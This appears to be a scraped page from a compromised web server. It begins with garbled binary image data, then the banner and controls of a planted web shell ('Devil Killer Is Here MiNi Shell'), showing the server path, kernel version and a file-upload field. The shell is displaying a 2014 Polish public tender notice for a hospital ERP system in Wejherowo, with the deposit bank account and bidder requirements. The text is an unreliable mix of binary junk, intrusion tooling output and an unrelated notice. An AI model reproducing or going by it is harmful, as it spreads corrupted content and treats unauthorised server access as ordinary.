JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140617/130461-N-2014.html

<p class="kh_header"><b>Wejherowo: DOSTAWA WRAZ Z USŁUGĄ INSTALACJI, KONFIGURACJI, INTEGRACJI I WDROŻENIA SZPITALNEGO SYSTEMU INFORMATYCZNEGO KLASY ERP- CZĘŚĆ ADMINISTRACYJNA DLA SZPITALA SPECJALISTYCZNEGO IM. F. CEYNOWY SP. Z O.O. W WEJHEROWIE</b><br>
<b>Numer ogłoszenia: 130461 - 2014; data zamieszczenia: 17.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny im. F. Ceynowy Sp. z o.o. , ul. dr A. Jagalskiego 10, 84-200 Wejherowo, woj. pomorskie, tel. 058 5727331, faks 058 5727331.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wejherowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Podmiot prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA WRAZ Z USŁUGĄ INSTALACJI, KONFIGURACJI, INTEGRACJI I WDROŻENIA SZPITALNEGO SYSTEMU INFORMATYCZNEGO KLASY ERP- CZĘŚĆ ADMINISTRACYJNA DLA SZPITALA SPECJALISTYCZNEGO IM. F. CEYNOWY SP. Z O.O. W WEJHEROWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem nn postępowania jest DOSTAWA WRAZ Z USŁUGĄ INSTALACJI, KONFIGURACJI, INTEGRACJI I WDROŻENIA SZPITALNEGO SYSTEMU INFORMATYCZNEGO (oprogramowania klasy ERP, dalej: System Informatyczny, SI lub System) - CZĘŚĆ ADMINISTRACYJNA DLA SZPITALA SPECJALISTYCZNEGO IM. FLORIANA CEYNOWY W WEJHEROWIE.
Nr wg słownika  CPV 48000000-8  (Pakiety oprogramowania i systemy informatyczne)

Przedmiot zamówienia obejmuje:
1.Dostawę, instalację i wdrożenie systemu bazodanowego oraz wszelkiego innego oprogramowania niezbędnego do prawidłowego działania oferowanego  Systemu Informatycznego,
2.Udzielenie licencji na korzystanie z Systemu Informatycznego (licencja bezterminowa),
3.Udzielenie licencji na korzystanie z systemu bazodanowego oraz wszelkiego innego oprogramowania niezbędnego do prawidłowego działania systemu Informatycznego (licencja bezterminowa),
4.Dostarczenie, zainstalowanie i wdrożenie rozwiązania dla  kopii bezpieczeństwa Zintegrowanego Systemu Informatycznego Szpitala czyli rozwiązania dla zaoferowanego Systemu Informatycznego łącznie z posiadanymi przez Szpital systemami a w szczególności z systemem CLININET, rozwiązanie powinno być oparte na posiadanym przez Szpital systemie NetBackup , 
5.Świadczenie usług nadzoru autorskiego, serwisu gwarancyjnego na wdrożony system i innego oprogramowania niezbędnego do prawidłowego działania systemu,
6.Wykonanie Analizy Przedwdrożeniowej, mającej na celu uzyskanie wiedzy niezbędnej do prawidłowego i efektywnego skonfigurowania systemu, zgodnie z potrzebami i oczekiwaniami Zamawiającego oraz opracowanie szczegółowej koncepcji wdrożenia Systemu Informatycznego, opracowanie dokumentu Analiza Przedwdrożeniowa zawierającego w szczególności: opis metodologii i organizacji realizacji przedmiotu umowy, opis szczegółowych wymagań i sposobu ich realizacji, opis procesów i sposobu ich obsługi przez System Informatyczny, zdefiniowanie wymagań do konfiguracji Systemu Informatycznego, opis potrzeb raportowania w szczególności wykaz szczegółowy wymaganych raportów z określeniem ich zawartości i formy, wymagania szczegółowe w zakresie migracji, wymagania szczegółowe w zakresie integracji, opis metodologii przeprowadzenia szkoleń, zakresu materiałów szkoleniowych i opracowanie planu szkoleń.
7.Opracowanie szczegółowego harmonogramu realizacji przedmiotu umowy.
8.Opracowanie, dostawę oraz instalację elementów Systemu Informatycznego  zgodnie z wymaganiami zapisanymi w SIWZ i w dokumencie Analiza Przedwdrożeniowa.
9.Zaimplementowanie w oferowanym Systemie Informatycznym formularzy, zestawień i wydruków wg wymagań zawartych w SIWZ oraz w Analizie Przedwdrożeniowej.
10.Integrację oferowanego Systemu Informatycznego  z systemami informatycznymi Szpitala, w tym: CLININET firmy CGM Polska Sp. z o.o., STER  firmy CGM Polska Sp. z o.o., CENTRUM firmy  MARCEL Sp. z o.o., Płatnik - ZUS, System bankowy. 
11.Migrację i konwersję  danych z eksploatowanych aktualnie przez Zamawiającego systemów informatycznych  do oferowanego Systemu Informatycznego. Migracja obejmuje dane z aktualnie przetwarzanych systemów Zamawiającego w tym: 	FK  firmy SIMPLE  S.A., Kadry firmy Unisoft Sp. z o.o., Płace  firmy Unisoft Sp. z o.o.
12.Opracowanie dokumentacji wdrożonego Systemu Informatycznego zawierającej opis przyjętych zasad funkcjonowania rozwiązania w Szpitalu, instrukcje stanowiskowe, dokumentację konfiguracji, 
13.Przeszkolenie Administratorów z zakresu: administracji i zarządzania zaoferowanym systemem bazodanowym, zarządzania zaoferowanym Systemem Informatycznym w zakresie konfiguracji poszczególnych funkcjonalności, zarządzania uprawnieniami, tworzenia dodatkowych funkcji, modyfikacji, zestawień i raportów w oferowanym Systemie Informatycznym, zarządzanie kopiami bezpieczeństwa, przeprowadzania aktualizacji systemu.
14.Przeszkolenie użytkowników oferowanego Systemu Informatycznego. 
15.Świadczenie usługi serwisowej w okresie gwarancji oraz nadzoru autorskiego dla Systemu Informatycznego zaoferowanego w ramach niniejszego zamówienia.
16.Szczegółowy zakres objęty przedmiotem nn postępowania określa załącznik nr 2 do SIWZ (Opis Przedmiotu Zamówienia), załącznik nr 3 do SIWZ (Formularz Asortymentowo-Cenowy) oraz załącznik nr 8 do SIWZ (Projekt Umowy).
Wykonawca uwzględni przy realizacji zamówienia wykorzystanie elementów istniejącej infrastruktury informatycznej Zamawiającego.
Zamawiający wymaga, aby Wykonawca na etapie wdrożenia wykonał wszystkie prace opisane w niniejszym załączniku, jak również inne niezbędne prace wynikające z przeprowadzonej Analizy Przedwdrożeniowej i zgodne z Harmonogramem realizacji umowy.
Oferowany System Informatyczny musi cechować się interoperacyjnością  i umożliwiać wymianę danych z innymi systemami, rozwiązaniami informatycznymi  Zamawiającego  i innych podmiotów gospodarczych, z którymi Zamawiający prowadzi lub będzie prowadził wymianę danych. 
Minimalne wymagania, które musi spełniać oferowany System Informatyczny do zarządzania działalnością administracyjną Szpitala szczegółowo opisane zostały w załączniku nr 2 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wysokość wymaganego wadium wynosi 25.000 zł. (słownie: dwadzieścia pięć tysięcy złotych)
2. Wadium przetargowe należy wnieść do dnia 30.06.2014 r. do godz. 09.00
3. Dowód wniesienia wadium w formie pieniężnej w celu ułatwienia Zamawiającemu identyfikacji wpływu wadium na konto Zamawiającego wskazanym jest aby był dołączony do oferty. W przypadku składania wadium w formie innej niż pieniężna Wykonawca jest zobowiązany złożyć oryginał dokumentu potwierdzającego zabezpieczenie oferty wadium w kasie Szpitala w terminie określonym w pkt 3 a kopię potwierdzoną za zgodność z oryginałem zgodnie z rozdz. 10 pkt 8 SIWZ winien załączyć do oferty. Wykonawca zamiast złożenia oryginału wadium w kasie Szpitala może załączyć oryginał dokumentu potwierdzającego zabezpieczenie oferty wadium do oferty. W takim przypadku Zamawiający nie załącza do oferty kopii przedmiotowego dokumentu. Zamawiający informuje, iż kasa Szpitala jest czynna od poniedziałku do piątku w godzinach od 09:00 do 14:00.
4. Wadium może być wnoszone :
a. w pieniądzu - konto: Szpital Specjalistyczny im. F. Ceynowy Sp. z o.o. w Wejherowie
Nordea Bank Polska S.A. 12 1440 1101 0000 0000 0686 4309		
b. w poręczeniach bankowych; 
c. w gwarancjach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, gwarancjach, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
d. w gwarancjach ubezpieczeniowych; 
e. w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnego warunku w tym zakresie. Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych w ofercie wymaganych oświadczeń na zasadzie spełnia - nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą brać udział Wykonawcy, którzy wykonali lub wykonują należycie w okresie ostatnich  3 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 zamówienia na dostawę wraz z instalacją, konfiguracją i wdrożeniem Systemu Informatycznego (oprogramowania klasy ERP) dla jednostek służby zdrowia tj. obsługującego co najmniej 7 spośród wymienionych obszarów: Zaopatrzenie, Gospodarka Magazynowa, Sprzedaż, Finanse, Zarządzanie Zasobami Ludzkimi (Kadry i Płace), Księgowość i Podatki, Rachunek Kosztów, Sprawozdawczość, Budżetowanie i Controlling Analizy Ekonomiczne i Generowanie Informacji Zarządczej, w tym co najmniej dwa zamówienia obejmujące dodatkowo integrację ww Systemu z systemem medycznym, o wartości nie mniejszej niż 300.000 zł brutto każde zrealizowane zamówienie, przy czym w ramach zrealizowanych ww zamówień  przynajmniej raz ujęte były obszary Rachunek Kosztów, Budżetowanie i Controlling oraz Generowanie Informacji Zarządczej (rozdział V pkt 1.1 b SIWZ). 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ww. warunek mogą spełniać łącznie.
Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych w ofercie wymaganych dokumentów i oświadczeń na zasadzie spełnia - nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnego warunku w tym zakresie. Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych w ofercie wymaganych oświadczeń na zasadzie spełnia - nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą brać udział Wykonawcy, którzy dysponują osobami, które będą uczestniczyć w wykonywaniu przedmiotowego zamówienia, w następującym minimalnym zakresie:
1.co najmniej jednym kierownikiem projektu, który posiada certyfikat z metodyki zarządzania projektami PRINCE 2 Practitioner lub równoważny oraz: wykształcenie wyższe o kierunku informatycznym, doświadczenie polegające na uczestniczeniu na stanowisku kierownika projektu w co najmniej 3 wdrożeniach Systemu Informatycznego (oprogramowania klasy ERP) w  jednostkach służby zdrowia, z których każdy projekt o wartości nie mniejszej niż 300.000 zł brutto; zdobyte w okresie ostatnich 5 lat przed upływem terminu składania ofert,
Powyższe wymagania muszą być spełnione łącznie.
2.co najmniej jednym kierownikiem projektu serwisu, który posiada doświadczenie związane z prowadzeniem co najmniej dwóch projektów utrzymania Systemu Informatycznego (oprogramowania klasy ERP), zdobyte w okresie ostatnich 5 lat przed upływem terminu składania ofert, 
3.co najmniej 3 konsultantami wdrożeniowymi, każdy posiadający: wykształcenie wyższe o kierunku informatycznym; doświadczenie polegające na uczestniczeniu na stanowisku wdrożeniowca w co najmniej jednym wdrożeniu Systemu Informatycznego (oprogramowania klasy ERP), zdobyte w okresie ostatnich 5 lat przed upływem terminu składania ofert, 
Powyższe wymagania muszą być spełnione łącznie.
4.co najmniej jednym projektantem, który posiada doświadczenie w dziedzinie projektowania systemów informatycznych tj. doświadczenie polegające na uczestniczeniu na stanowisku projektanta w co najmniej 1 wdrożeniu Systemu Informatycznego (oprogramowania klasy ERP), zdobyte w okresie ostatnich 5 lat przed upływem terminu składania ofert,
5.co najmniej 3 programistami, każdy posiadający doświadczenie w dziedzinie programowania systemów informatycznych tj. doświadczenie polegające na uczestniczeniu na stanowisku programisty w co najmniej 1 wdrożeniu Systemu Informatycznego (oprogramowania klasy ERP), zdobyte w okresie ostatnich 5 lat przed upływem terminu składania ofert,
6.co najmniej jednym testerem, który posiada doświadczenie w dziedzinie testowania systemów informatycznych tj. doświadczenie polegające na uczestniczeniu na stanowisku testera w co najmniej 1 wdrożeniu Systemu Informatycznego (oprogramowania klasy ERP), zdobyte w okresie ostatnich 5 lat przed upływem terminu składania ofert.
UWAGA 1: Zamawiający dopuszcza łączenie ww funkcji. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ww. warunek mogą spełniać łącznie.
UWAGA 2: Poprzez certyfikat równoważny Zamawiający rozumie, że Wykonawca dla każdej roli, w której wymaga stosownego certyfikatu opisanego powyżej przedstawi certyfikat, który:
-jest analogiczny co do zakresu z przykładowymi certyfikatami wskazanymi z nazwy dla danej roli, co jest rozumiane jako analogiczna dziedzina merytoryczna wynikająca z roli, której dotyczy certyfikat (np. zarządzanie bazami danych, kompetencje związane z zarządzaniem projektami, testowaniem, administrowaniem bazami danych, programowaniem, etc.), analogiczny stopień poziomu kompetencji (np. podstawowy, zaawansowany, ekspert), analogiczny poziom doświadczenia zawodowego wymagany do otrzymania danego certyfikatu (np. konieczność wykazania się uczestnictwem w określonej liczbie projektów danej roli lub liczba lat pracy w danej roli, etc.)
-potwierdzony jest egzaminem (dotyczy tylko tych ról, których przykładowe certyfikaty muszą być potwierdzone egzaminem).
Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych w ofercie wymaganych dokumentów i oświadczeń na zasadzie spełnia - nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą brać udział Wykonawcy, którzy  posiadają na rachunku bankowym lub spółdzielczej kasy oszczędnościowo-kredytowej środki finansowe lub posiadają zdolność kredytową w wysokości co najmniej 300.000 zł brutto (rozdział 5 pkt 1.1d  SIWZ). Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ww. warunek mogą spełniać łącznie.
Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych w ofercie wymaganych dokumentów i oświadczeń na zasadzie spełnia - nie spełnia warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych wykonywanych głównych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie tj. co najmniej 3 główne zamówienia na dostawę wraz z instalacją, konfiguracją i wdrożeniem Systemu Informatycznego (oprogramowania klasy ERP) dla jednostek służby zdrowia obsługującego co najmniej 7 spośród wymienionych obszarów: Zaopatrzenie, Gospodarka Magazynowa, Sprzedaż, Finanse, Zarządzanie Zasobami Ludzkimi (Kadry i Płace), Księgowość i Podatki, Rachunek Kosztów, Sprawozdawczość, Budżetowanie i Controlling Analizy Ekonomiczne i Generowanie Informacji Zarządczej, w tym co najmniej dwa zamówienia obejmujące dodatkowo integrację ww Systemu z systemem medycznym, o wartości nie mniejszej niż 300.000 zł brutto każde zrealizowane zamówienie, przy czym w ramach zrealizowanych ww zamówień  przynajmniej raz ujęte były obszary Rachunek Kosztów, Budżetowanie i Controlling oraz Generowanie Informacji Zarządczej - załącznik nr 5 do SIWZ.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Pozytywna opinia biegłego rewidenta wydana nie wcześniej niż 01.05.2014 r. potwierdzająca pełną zgodność  co do formy i treści oferowanego rozwiązania informatycznego w zakresie systemu finansowo-księgowego z obowiązującą ustawą o rachunkowości z dnia 29.09.1994r., t. j. Dz.U.2013.330 z późniejszymi zmianami.
